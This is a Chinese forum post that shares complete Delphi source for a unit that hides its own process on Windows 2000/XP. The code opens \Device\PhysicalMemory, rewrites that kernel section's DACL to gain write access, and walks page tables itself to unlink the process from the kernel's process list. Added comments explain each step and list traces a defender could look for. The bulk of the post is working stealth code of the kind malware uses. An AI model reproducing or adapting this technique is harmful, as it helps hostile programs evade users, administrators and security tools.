阿杰 发表于 2009-7-24 21:29:36

【开源】隐藏进程代码DELPHI版

{ HideProcess: a user-mode process-hiding unit as posted on the forum in 2009.

  What the code below does, as written: it loads ntdll.dll and resolves
  ZwOpenSection / RtlInitUnicodeString at run time, opens the
  \Device\PhysicalMemory section for read+write (first widening the
  section's DACL if that open is denied), maps the page that holds the page
  directory at a hard-coded physical address, translates kernel virtual
  addresses to physical ones by walking the 32-bit page tables itself, and
  finally rewrites two list-link pointers inside a kernel process structure
  so that the calling process drops out of that list.

  Applicability: OpenPhysicalMemory returns 0 unless dwMajorVersion = 5 and
  dwMinorVersion is 0 or 1 (Windows 2000 / XP), and every address and field
  offset used is hard-coded for those releases. Windows Server 2003 SP1 and
  later do not grant user-mode callers access to \Device\PhysicalMemory, so
  this path fails there.

  Defensive note: the observable footprint of this unit is a user-mode
  handle to \Device\PhysicalMemory requested with SECTION_MAP_WRITE, a DACL
  rewrite on that kernel section object (SetSecurityInfo with
  SE_KERNEL_OBJECT), and page-sized MapViewOfFile calls against it from an
  ordinary process. Only two list pointers are changed; nothing else about
  the process is touched, so enumeration that does not depend on that list
  (object scanning, handle-table checks) still sees it. }
unit HideProcess;

interface

{ Public entry point: attempts the hide once and caches the outcome in b_hide. }
function MyHideProcess: Boolean;

implementation

uses
   Windows,
    Classes, AclAPI, accCtrl;

type
   // Native API status code; success is signalled by a non-negative value
   // (see the NT_SUCCESS macro quoted below).
   NTSTATUS = LongInt;

const
   //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
   STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004); // declared but not used in this unit
   STATUS_ACCESS_DENIED = NTSTATUS($C0000022);        // the only status compared against below
   // OBJ_* attribute flags: declared for completeness; OpenPhysicalMemory
   // passes Attributes := 0 and never uses them.
   OBJ_INHERIT = $00000002;
   OBJ_PERMANENT = $00000010;
   OBJ_EXCLUSIVE = $00000020;
   OBJ_CASE_INSENSITIVE = $00000040;
   OBJ_OPENIF = $00000080;
   OBJ_OPENLINK = $00000100;
   OBJ_KERNEL_HANDLE = $00000200;
   OBJ_VALID_ATTRIBUTES = $000003F2;

type
   // Hand-declared native API structures (not provided by the Delphi Windows unit).
   PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
   IO_STATUS_BLOCK = record   // declared but not referenced in this unit
     Status: NTSTATUS;
     FObject: DWORD;
   end;

   PUNICODE_STRING = ^UNICODE_STRING;
   UNICODE_STRING = record
     Length: Word;
     MaximumLength: Word;
     Buffer: PWideChar;
   end;

   POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
   OBJECT_ATTRIBUTES = record
     Length: DWORD;
     RootDirectory: Pointer;
     ObjectName: PUNICODE_STRING;
     Attributes: DWORD;
     SecurityDescriptor: Pointer;
     SecurityQualityOfService: Pointer;
   end;

   // Function-pointer types for the two ntdll exports resolved in InitNTDLL.
   TZwOpenSection = function(SectionHandle: PHandle;
     DesiredAccess: ACCESS_MASK;
     ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
   TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
     SourceString: PWideChar); stdcall;

var
   RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
   ZwOpenSection: TZwOpenSection = nil;
   g_hNtDLL: THandle = 0;               // module handle from LoadLibrary('ntdll.dll')
   g_pMapPhysicalMemory: Pointer = nil; // view of the page-directory page; never unmapped in this unit
   g_hMPM: THandle = 0;                 // section handle for \Device\PhysicalMemory
   g_hMPM2: THandle = 0;                // declared but not used in this unit
   g_osvi: OSVERSIONINFO;               // filled by OpenPhysicalMemory, re-read by YHideProcess
   b_hide: Boolean = false;             // cached result of the one hide attempt
//---------------------------------------------------------------------------

{ Loads ntdll.dll and resolves the two exports this unit calls.
  Returns False only if LoadLibrary fails; the GetProcAddress results are
  not checked, so a nil function pointer would surface later as a call
  through nil. }
function InitNTDLL: Boolean;
begin
   g_hNtDLL := LoadLibrary('ntdll.dll');

   if 0 = g_hNtDLL then
   begin
     Result := false;
     Exit;
   end;

   RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
   ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');

   Result := True;
end;
//---------------------------------------------------------------------------

{ Releases the ntdll module handle taken by InitNTDLL and resets it to 0. }
procedure CloseNTDLL;
begin
   if (0 <> g_hNtDLL) then
     FreeLibrary(g_hNtDLL);
   g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------

{ Rewrites the DACL of the given section object so that the trustee named
  'CURRENT_USER' is granted SECTION_MAP_WRITE. Called by OpenPhysicalMemory
  when the first read/write open of \Device\PhysicalMemory is denied.
  Note: each of the three error branches frees what was allocated but does
  not Exit, so execution continues into the next API call regardless. }
procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
   pDacl: PACL;
   pSD: PPSECURITY_DESCRIPTOR;
   pNewDacl: PACL;
   dwRes: DWORD;
   ea: EXPLICIT_ACCESS;
begin
   pDacl := nil;
   pSD := nil;
   pNewDacl := nil;

   // Read the current DACL of the section object.
   dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);

   if ERROR_SUCCESS <> dwRes then
   begin
     if Assigned(pSD) then
       LocalFree(Hlocal(pSD^));
     if Assigned(pNewDacl) then
       LocalFree(HLocal(pNewDacl));
   end;

   // One explicit-access entry: grant SECTION_MAP_WRITE to 'CURRENT_USER'.
   ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
   ea.grfAccessPermissions := SECTION_MAP_WRITE;
   ea.grfAccessMode := GRANT_ACCESS;
   ea.grfInheritance := NO_INHERITANCE;
   ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
   ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
   ea.Trustee.ptstrName := 'CURRENT_USER';

   // Merge the new entry into the existing DACL.
   dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);

   if ERROR_SUCCESS <> dwRes then
   begin
     if Assigned(pSD) then
       LocalFree(Hlocal(pSD^));
     if Assigned(pNewDacl) then
       LocalFree(HLocal(pNewDacl));
   end;

   // Write the merged DACL back onto the kernel object.
   dwRes := SetSecurityInfo

   (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);

   if ERROR_SUCCESS <> dwRes then
   begin
     if Assigned(pSD) then
       LocalFree(Hlocal(pSD^));
     if Assigned(pNewDacl) then
       LocalFree(HLocal(pNewDacl));
   end;

end;
//---------------------------------------------------------------------------

{ Opens \Device\PhysicalMemory into g_hMPM and maps one page ($1000 bytes)
  at the hard-coded physical address of the page directory into
  g_pMapPhysicalMemory.
  Returns g_hMPM on success, 0 if the OS is not major version 5 with minor
  version 0 or 1, if the open fails, or if the map fails.
  The page-directory addresses ($30000 / $39000) are the author's constants
  for those two releases and are not verified here. }
function OpenPhysicalMemory: THandle;
var
   status: NTSTATUS;
   physmemString: UNICODE_STRING;
   attributes: OBJECT_ATTRIBUTES;
   PhyDirectory: DWORD;
begin
   g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
   GetVersionEx(g_osvi);

   // Version gate: anything other than the 5.x kernels is refused outright.
   if (5 <> g_osvi.dwMajorVersion) then
   begin
     Result := 0;
     Exit;
   end;

   case g_osvi.dwMinorVersion of
     0: PhyDirectory := $30000;
     1: PhyDirectory := $39000;
   else
     begin
       Result := 0;
       Exit;
     end;
   end;

   RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');

   attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
   attributes.RootDirectory := nil;
   attributes.ObjectName := @physmemString;
   attributes.Attributes := 0;
   attributes.SecurityDescriptor := nil;
   attributes.SecurityQualityOfService := nil;

   status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);

   // If read/write access is denied, reopen with rights sufficient to edit
   // the DACL, widen it, close, and retry the read/write open. The return
   // value of the READ_CONTROL/WRITE_DAC open is not checked.
   if (status = STATUS_ACCESS_DENIED) then
   begin
     ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
     SetPhyscialMemorySectionCanBeWrited(g_hMPM);
     CloseHandle(g_hMPM);

     status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
   end;

   // NT_SUCCESS: negative status means failure.
   if not (LongInt(status) >= 0) then
   begin
     Result := 0;
     Exit;
   end;

   // Map the single page at the page-directory physical address.
   g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
     FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);

   if (g_pMapPhysicalMemory = nil) then
   begin
     Result := 0;
     Exit;
   end;

   Result := g_hMPM;
end;
//---------------------------------------------------------------------------

{ Translates the virtual address addr to a physical address by walking a
  two-level 32-bit page table (no PAE) whose page directory is mapped at
  BaseAddress.
  Bits 31..22 of addr index the directory; a clear bit 0 (not present)
  yields nil. A set bit 7 ($80) is treated as a 4 MB page, so the physical
  address is the 4 MB frame plus the low 22 bits. Otherwise the page table
  referenced by the directory entry is mapped from g_hMPM for one page,
  bits 21..12 index it, a not-present entry yields nil, and the result is
  the 4 KB frame plus the low 12 bits. The temporary page-table view is
  unmapped before returning; the not-present early Exit inside that branch
  returns without unmapping it. }
function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
   VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
   VAddr := DWORD(addr);
//   PGDE := BaseAddress;
   PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // modify by dot.

   if 0 = (PGDE and 1) then
   begin
     Result := nil;
     Exit;
   end;

   tmp := PGDE and $00000080;

   if (0 <> tmp) then
   begin
     PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
   end
   else
   begin
     PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
//     PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
     PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // modify by dot.

     if (0 = (PTE and 1)) then
     begin
       Result := nil;
       Exit;
     end;

     PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
     UnmapViewOfFile(Pointer(PGDE));
   end;

   Result := Pointer(PAddr);
end;
//---------------------------------------------------------------------------

{ Reads one DWORD at virtual address addr through the physical-memory
  section: translates addr with LinearToPhys, maps the containing 4 KB
  page, reads the DWORD at the page offset, unmaps.
  Returns 0 if the page could not be mapped; a translation failure (nil
  from LinearToPhys) is not distinguished and results in a map at physical
  address 0. }
function GetData(addr: Pointer): DWORD;
var
   phys, ret: DWORD;
   tmp: PDWORD;
begin
   phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
   tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
     phys and $FFFFF000, $1000));

   if (nil = tmp) then
   begin
     Result := 0;
     Exit;
   end;

//   ret := tmp[(phys and $FFF) shr 2];
   ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // modify by dot.
   UnmapViewOfFile(tmp);

   Result := ret;
end;
//---------------------------------------------------------------------------

{ Writes one DWORD at virtual address addr through the physical-memory
  section; same translate/map/unmap sequence as GetData but with a
  write-only view. Returns False if the page could not be mapped. }
function SetData(addr: Pointer; data: DWORD): Boolean;
var
   phys: DWORD;
   tmp: PDWORD;
begin
   phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
   tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));

   if (nil = tmp) then
   begin
     Result := false;
     Exit;
   end;

//   tmp[(phys and $FFF) shr 2] := data;
   PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // modify by dot.
   UnmapViewOfFile(tmp);

   Result := TRUE;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------

{ Performs the hide: reads a pointer from the fixed address $FFDFF124
  (the author's comment calls it "kteb"), follows +$44 to a second
  structure ("kpeb"), reads two pointers fw/bw from it at offsets that
  depend on the minor version ($A0/$A4 for minor 0, $88/$8C for minor 1),
  and cross-writes them: bw into fw+4 and fw into bw. That is the shape of
  unlinking a node from a doubly-linked list, so fw/bw look like the
  forward/backward links of the current process's list entry.
  Returns False if ntdll or the physical-memory section could not be set
  up, or for any other minor version. The SetData results are ignored.
  On the OpenPhysicalMemory failure path CloseNTDLL is not called, and the
  g_pMapPhysicalMemory view is never unmapped. }
function YHideProcess: Boolean;
var
   thread, process: DWORD;
   fw, bw: DWORD;
begin
//   SetUnhandledExceptionFilter(exeception);
   if (FALSE = InitNTDLL) then
   begin
     Result := FALSE;
     Exit;
   end;

   if (0 = OpenPhysicalMemory) then
   begin
     Result := FALSE;
     Exit;
   end;

   thread := GetData(Pointer($FFDFF124)); //kteb
   process := GetData(Pointer(thread + $44)); //kpeb

   if (0 = g_osvi.dwMinorVersion) then
   begin
     fw := GetData(Pointer(process + $A0));
     bw := GetData(Pointer(process + $A4));

     SetData(Pointer(fw + 4), bw);
     SetData(Pointer(bw), fw);

     Result := TRUE;
   end
   else if (1 = g_osvi.dwMinorVersion) then
   begin
     fw := GetData(Pointer(process + $88));
     bw := GetData(Pointer(process + $8C));

     SetData(Pointer(fw + 4), bw);
     SetData(Pointer(bw), fw);

     Result := TRUE;
   end
   else
   begin
     Result := False;
   end;

   CloseHandle(g_hMPM);
   CloseNTDLL;
end;

{ Public entry point. Runs YHideProcess only while b_hide is still False,
  so a successful hide is attempted once per process lifetime and a failed
  one is retried on the next call. Returns the cached flag. }
function MyHideProcess: Boolean;
begin
   if not b_hide then
   begin
     b_hide := YHideProcess;
   end;

   Result := b_hide;
end;

end.

upring 发表于 2015-6-4 13:31:20

帖子乱码了